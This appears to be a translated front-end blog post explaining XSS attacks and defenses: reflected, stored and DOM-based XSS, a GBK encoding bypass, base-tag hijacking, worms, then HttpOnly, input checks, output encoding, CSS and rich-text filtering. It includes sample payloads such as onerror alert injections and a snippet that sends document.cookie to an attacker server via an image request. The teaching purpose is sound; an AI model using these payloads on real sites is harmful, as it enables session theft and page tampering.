Moment For Technology

Impress the interviewer: the most complete guide to XSS attack and defense!

Posted on Jan. 31, 2023, 1:50 p.m. by 樊龍
Category: Front end Tag: javascript


To improve page performance and reduce white-screen time, my details page receives a cover parameter from the list page: the link of an image that the list page has already loaded. When the user jumps to my details page, that image is displayed first (from the browser cache), which greatly reduces the white-screen time.

Of course, to prevent XSS, I applied a strict filter to this image link.

Then one day my leader sent me a link. I clicked it, and there was an ugly picture in the middle of the page. I was stunned. I immediately copied the link, extracted the cover parameter, decoded it, and found an external "illegal link". My leader said that my page had been hit by XSS.

OK, it was probably XSS, so I decided to add a layer of verification on the image domain: the image domain must be one of our own domain names.

Then I modified, verified, published, and refreshed the CDN, all at the pace of a 100-meter sprint...

So, is the problem solved? It looks solved! Or is it not completely solved after all?

So what exactly was solved?

Let's walk into the world of XSS!


Cross-site scripting would naturally be abbreviated as CSS, but to distinguish it from Cascading Style Sheets (CSS), the security field calls it "XSS".

In the 1990s, these attacks were mostly cross-domain, and a website corresponded to a domain name, hence the name "cross-site scripting". Today it no longer matters whether the attack is cross-domain, but for historical reasons the name XSS has persisted.

Contents of this article:

XSS main classification;

XSS payload attack; Character encoding attacks; Attack with Base tag; XSS worm attack;

HttpOnly defense; User input check defense; HTML output check defense; Output defense in CSS; Rich text defense

XSS main classification

  1. Reflected XSS

    Reflected XSS, as the name suggests, simply "reflects" the user's input back to the browser. For example, when a link is visited, the page executes document.getElementById("content").innerHTML = content; where content is passed in as a URL parameter. Malicious HTML hidden in that parameter is written into the page, which triggers reflected XSS.

  2. Stored XSS

    Stored XSS, as the name suggests, is saved by the server. For example, a user enters a comment in a text box and submits it to the back end; when other users later view the comments, the stored XSS is triggered. For example, the user enters:

    <script>alert(1)</script>

    If the page then renders the comment into the comment area without escaping, every user who views the comment sees a pop-up window showing "1", so the impact of stored XSS is huge. (Browsers do not run script tags inserted through innerHTML, so when the comment is rendered that way, attackers use an event-handler payload instead, such as an image with an onerror attribute.)

  3. DOM-based XSS

    DOM-based XSS is, in effect, also a kind of reflected XSS, but because of its particularity it is listed separately. For example, a page has a text box and a button: the user enters a link and then clicks the button to generate a jump link.

    <div id="jump"></div>

    <input type="text" id="msg" value="" />

    <input type="button" id="btn" value="Confirm" onclick="myClick()" />

    function myClick() {

        // Read what the user typed into the text box
        let value = document.getElementById("msg").value;

        // Unsafe: the input is concatenated directly into HTML
        document.getElementById("jump").innerHTML = "<a href='" + value + "'>click</a>";

    }

    We can type:

        '><img src="" onerror=alert(/xss/) />

    So when you click the button, the page code is changed to:

    <a href=''><img src="" onerror=alert(/xss/) />'>click</a>

    Because the image link is empty, loading fails and onerror fires, popping up "/xss/". That is DOM-based XSS.
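One way to close the hole in the jump-link example is to validate the input as a URL and escape it before it reaches the markup. The sketch below is only an illustration: buildJumpLink and escapeAttr are hypothetical helper names that do not appear in the original page, and the rule "only http and https links are allowed" is an assumption.

```javascript
// Hypothetical helper: escape characters that can break out of an HTML attribute.
function escapeAttr(text) {
    const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
    return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical replacement for the string concatenation in myClick():
// returns the link markup, or null when the input is not an http(s) URL.
function buildJumpLink(value) {
    let url;
    try {
        url = new URL(value); // throws for anything that is not an absolute URL
    } catch (e) {
        return null;
    }
    if (url.protocol !== "http:" && url.protocol !== "https:") {
        return null; // rejects javascript:, data:, and similar schemes
    }
    return "<a href='" + escapeAttr(url.href) + "'>click</a>";
}

console.log(buildJumpLink("https://example.com/a?b=1&c=2"));
// <a href='https://example.com/a?b=1&amp;c=2'>click</a>
console.log(buildJumpLink("'><img src=\"\" onerror=alert(/xss/) />"));
// null
```

In a browser, building the element with document.createElement("a") and assigning href and textContent avoids HTML string concatenation altogether; the string version is used here only so the check can run outside a page.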

XSS payload

After a successful XSS attack, the attacker has implanted a malicious script into the page. With that script in place, the attacker can do all kinds of things; the script that carries out these actions is called the XSS payload.

For example, in the DOM XSS example above, the input could instead inject a script tag whose src points to an xxx.js file on the attacker's server.

When the user clicks the button, xxx.js is loaded, and it can obtain the user's cookie, for example:

// Create an image element; assigning src makes the browser send a request
let img = document.createElement('img');

// The empty string stands for the address of the XXX server; the cookie is appended to it
img.src = "" + encodeURIComponent(document.cookie);

This code secretly uploads the user's cookies to the XXX server.

Once the cookie information is stolen, the consequences can be severe.

Of course, stealing cookies is not the only option: the injected JS can perform arbitrary operations, such as calling interfaces to query data and sending that data to the XXX server, or directly calling interfaces to perform deletions.

Attack using character encoding

In HTML encoded with the GB2312 family (GBK/GB2312), %c0 can "eat" %5c (that is, the backslash \). Baidu once output a variable inside a script tag, so an attacker could try submitting "; alert(/xss/); // as the input: the " closes the preceding string and the // comments out whatever follows. But Baidu escaped the double quotation mark, as follows:

let redirectUrl = "\"; alert(/xss/); //";

This way the XSS fails: the input remains ordinary string content. However, Baidu returned the page in GBK/GB2312 encoding, in which the bytes %c0 and \ (%5c) combine into a single double-byte character. So the attacker can construct the input %c0"; alert(/xss/); // instead. After submission, Baidu escaped the quotation mark and the response became:

let redirectUrl = "%c0\"; alert(/xss/); //";

Since the page is GBK encoded, %c0\ is combined into one character, which eats the "\" and leaves the following:

let redirectUrl = "繺"; alert(/xss/); //";

The double quotation mark is no longer escaped, so it closes the string and alert(/xss/) runs. The page has been XSSed.
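The byte-level mechanics can be sketched without a real decoder. The code below is a simplified model, not Baidu's actual code: escapeQuotes, splitGbk, and hasUnescapedQuote are hypothetical names, the escaper is assumed to work on single bytes, and the pairing rule is the GBK double-byte range (lead byte 0x81-0xFE, trail byte 0x40-0xFE except 0x7F).

```javascript
// Escape double quotes byte by byte, unaware of the page encoding:
// 0x22 (") becomes 0x5C 0x22 (\").
function escapeQuotes(bytes) {
    const out = [];
    for (const b of bytes) {
        if (b === 0x22) out.push(0x5c);
        out.push(b);
    }
    return out;
}

// Split bytes into characters the way a GBK decoder pairs them.
function splitGbk(bytes) {
    const chars = [];
    for (let i = 0; i < bytes.length; i++) {
        const lead = bytes[i];
        const trail = bytes[i + 1];
        const isPair = lead >= 0x81 && lead <= 0xfe &&
            trail !== undefined && trail >= 0x40 && trail <= 0xfe && trail !== 0x7f;
        if (isPair) {
            chars.push([lead, trail]);
            i++; // the trail byte is consumed by the lead byte
        } else {
            chars.push([lead]);
        }
    }
    return chars;
}

// True when some double quote is not preceded by a standalone backslash.
function hasUnescapedQuote(chars) {
    return chars.some((c, i) =>
        c.length === 1 && c[0] === 0x22 &&
        !(i > 0 && chars[i - 1].length === 1 && chars[i - 1][0] === 0x5c));
}

const plain = escapeQuotes([0x22, 0x3b]);         // input: ";
const attack = escapeQuotes([0xc0, 0x22, 0x3b]);  // input: %c0";
console.log(hasUnescapedQuote(splitGbk(plain)));  // false
console.log(hasUnescapedQuote(splitGbk(attack))); // true
```

In the second case the escaper emits the bytes C0 5C 22, and the decoder pairs C0 with 5C, so the quotation mark is left unescaped. Escaping after decoding, or serving pages as UTF-8, would avoid this mismatch.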

Use the Base tag

In code, we sometimes set a base tag so that relative paths can be used. For example:

<base href="" />

<img src="/img/t1234342334.jpg" />

In this case, the full path of the image is the base href joined with src. An attacker who manages to inject a base tag into the page can point it at their own server and place images and JS files under the matching paths there. The relative URLs on the page then load from the attacker's server, and the page is XSSed.

<base href="" />
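How a changed base redirects relative resources can be seen with the standard URL constructor, which resolves a relative path against a base in the same way. The host names site.example and attacker.example below are placeholders chosen for illustration, not values from the original page.

```javascript
// Resolve a relative resource path against a base URL.
function resolveResource(src, baseHref) {
    return new URL(src, baseHref).href;
}

const src = "/img/t1234342334.jpg";

// With the site's own base, the image comes from the site.
console.log(resolveResource(src, "https://site.example/page/"));
// https://site.example/img/t1234342334.jpg

// With an injected base, the same src now points at the attacker's server.
console.log(resolveResource(src, "https://attacker.example/"));
// https://attacker.example/img/t1234342334.jpg
```

The same resolution applies to script src values, which is why an injected base tag can lead to script execution and not only to swapped images.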

XSS worms

The core of an XSS worm is inducing users to click a link. The attacker implants malicious HTML code in a web page and sends it to target users. Once a user clicks it, they are infected, and disguised links are then automatically sent to the infected user's friends.

Once the infection spreads, the effects can be severe. Baidu Space suffered an XSS worm incident in 2007.

The difficulty of an XSS worm attack lies in inducing users to click the disguised link.

XSS defenses

XSS is the number one enemy of the Web front end, and XSS defense is complex.


HttpOnly

HttpOnly was first proposed by Microsoft and implemented in Internet Explorer 6; it has since become a standard. The browser prevents the page's JavaScript from accessing any cookie that carries the HttpOnly attribute.

HttpOnly is primarily intended to counter cookie hijacking after XSS, such as the XSS payload above that reads cookie information. If the page had no XSS at all, HttpOnly would not be needed.

HttpOnly mitigates the damage of an XSS attack by preventing the theft of sensitive cookies; it does not solve XSS itself.
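HttpOnly is set by the server in the Set-Cookie response header. As a minimal sketch, the helper below builds such a header value; the function name buildSessionCookie, the cookie name sid, and the extra Path, Secure, and SameSite attributes are illustrative assumptions and not part of the original article.

```javascript
// Build a Set-Cookie header value that carries the HttpOnly attribute.
function buildSessionCookie(name, value) {
    // encodeURIComponent keeps separators such as ";" out of the cookie value
    return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

console.log(buildSessionCookie("sid", "abc123"));
// sid=abc123; Path=/; HttpOnly; Secure; SameSite=Lax
```

A cookie set this way is still sent with requests, but document.cookie in the page no longer exposes it, so a payload like the cookie-stealing image above comes back without the session cookie.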

User input check

Input checking works somewhat like "whitelisting": only data that meets the rules is allowed to be stored. For example, a user name may contain only letters, digits, and underscores (_). In current practice, the same input validation is implemented on both the server and the client, because validation done only on the client is too easy for attackers to bypass.
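The user name rule above can be written as a whitelist check. This is a small sketch; isValidUserName is a hypothetical name, and the same function is assumed to run on both the client and the server.

```javascript
// Accept only non-empty strings made of letters, digits, and underscores.
function isValidUserName(name) {
    return typeof name === "string" && /^[A-Za-z0-9_]+$/.test(name);
}

console.log(isValidUserName("moment_2023"));               // true
console.log(isValidUserName("<script>alert(1)</script>")); // false
```

Because the pattern lists what is allowed instead of what is forbidden, any character an attacker needs for markup is rejected by default.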

An XSS input check is also known as an "XSS filter".

However, XSS filters are sometimes too aggressive and cause problems of their own. For example, a user enters the nickname World "first". The XSS filter escapes the double quotation marks, and we get World \"first\". If we then display it directly on an HTML page, it shows World \"first\" with the backslashes, which is obviously not what we want.

HTML output check

Generally speaking, besides checking input, we also need to defend on output: except for rich text, which is harder to handle, data that is output into HTML should be encoded or escaped to defend against XSS attacks.

In general, to combat XSS, we HTML-encode at least the following characters:

& -- &amp;

< -- &lt;

> -- &gt;

" -- &quot;

' -- &#x27;

/ -- &#x2f;
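The mapping above translates directly into a small escaping function. This is a minimal sketch; the names HTML_ESCAPES and escapeHtml are chosen for illustration.

```javascript
// The six characters listed above and their HTML entities.
const HTML_ESCAPES = {
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#x27;",
    "/": "&#x2f;",
};

// Replace every listed character in a single pass, so "&" is never double-encoded.
function escapeHtml(text) {
    return String(text).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

console.log(escapeHtml("<script>alert(1)</script>"));
// &lt;script&gt;alert(1)&lt;&#x2f;script&gt;
```

The escaped string is displayed by the browser as text, so the comment from the stored XSS example would show up literally instead of running.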

Output in CSS

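Both the style tag and the style attribute can produce XSS through CSS (older browsers would execute javascript: URLs inside url()), for example:

<style>
body {
    background: url(javascript:alert(/xss/));
}
</style>

<div style="background:url(javascript:alert(/xss/))"></div>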


In general, we prohibit user-controllable variables inside style tags and the style attribute of HTML tags. If they are required, the values must be strictly encoded or filtered, for example by keeping only letters, digits, and underscores.
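The "keep only letters, digits, and underscores" rule can be sketched as a filter applied to any user value before it is placed into CSS. The name sanitizeCssValue is hypothetical, and such a strict rule only fits simple values like a theme or class name.

```javascript
// Drop every character that is not a letter, digit, or underscore.
function sanitizeCssValue(value) {
    return String(value).replace(/[^A-Za-z0-9_]/g, "");
}

console.log(sanitizeCssValue("theme_dark"));
// theme_dark
console.log(sanitizeCssValue("url(javascript:alert(/xss/))"));
// urljavascriptalertxss
```

With the parentheses, colon, and slashes removed, the second value can no longer form a url() expression.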

Rich text

Rich text is content that itself contains tags and elements. When filtering rich text, we should strip "events" that may be embedded, such as onclick on elements, and also remove dangerous tags such as iframe, script, base, and form.

For a more rigorous approach, you can use an HTML parser such as htmlParse to convert all the nodes into an AST and then filter them one by one, so that possible XSS is filtered out completely.
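The node-by-node filtering can be sketched as a recursive walk over the tree. The node shape used here is a hypothetical one invented for illustration, not the output format of htmlParse or any particular parser, and filterNode is likewise an assumed name.

```javascript
// Tags removed entirely, following the list in the text above.
const FORBIDDEN_TAGS = new Set(["iframe", "script", "base", "form"]);

// Hypothetical AST node shapes:
//   { type: "text", value: string }
//   { type: "element", tag: string, attrs: object, children: array }
function filterNode(node) {
    if (node.type === "text") {
        return node;
    }
    if (FORBIDDEN_TAGS.has(node.tag.toLowerCase())) {
        return null; // drop the whole subtree
    }
    const attrs = {};
    for (const [name, value] of Object.entries(node.attrs || {})) {
        if (/^on/i.test(name)) continue; // strip event handlers such as onclick
        attrs[name] = value;
    }
    const children = (node.children || [])
        .map(filterNode)
        .filter((child) => child !== null);
    return { type: "element", tag: node.tag, attrs, children };
}

const tree = {
    type: "element", tag: "div", attrs: { class: "post", onclick: "evil()" },
    children: [
        { type: "text", value: "hello" },
        { type: "element", tag: "script", attrs: {}, children: [] },
    ],
};
console.log(JSON.stringify(filterNode(tree)));
// {"type":"element","tag":"div","attrs":{"class":"post"},"children":[{"type":"text","value":"hello"}]}
```

A production filter would usually go further, for example allowing only a whitelist of tags and checking href and src values for javascript: URLs; the sketch covers only the two rules named in the text.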

An XSS filter is provided below for your reference:

function xss(str) {

    // Encode characters that could break out of an HTML attribute value
    return str ? str.replace(/(?:^$|[\x00\x09-\x0D "'`=<>])/g, (m) => {

        return m === '\t'   ? '&#9;'

            :  m === '\n'   ? '&#10;'

            :  m === '\x0B' ? '&#11;'

            :  m === '\f'   ? '&#12;'

            :  m === '\r'   ? '&#13;'

            :  m === ' '    ? '&#32;'

            :  m === '='    ? '&#61;'

            :  m === '<'    ? '&lt;'

            :  m === '>'    ? '&gt;'

            :  m === '"'    ? '&quot;'

            :  m === "'"    ? '&#39;'

            :  m === '`'    ? '&#96;'

            : '\uFFFD'; // NUL becomes the Unicode replacement character

    }) : '';

}
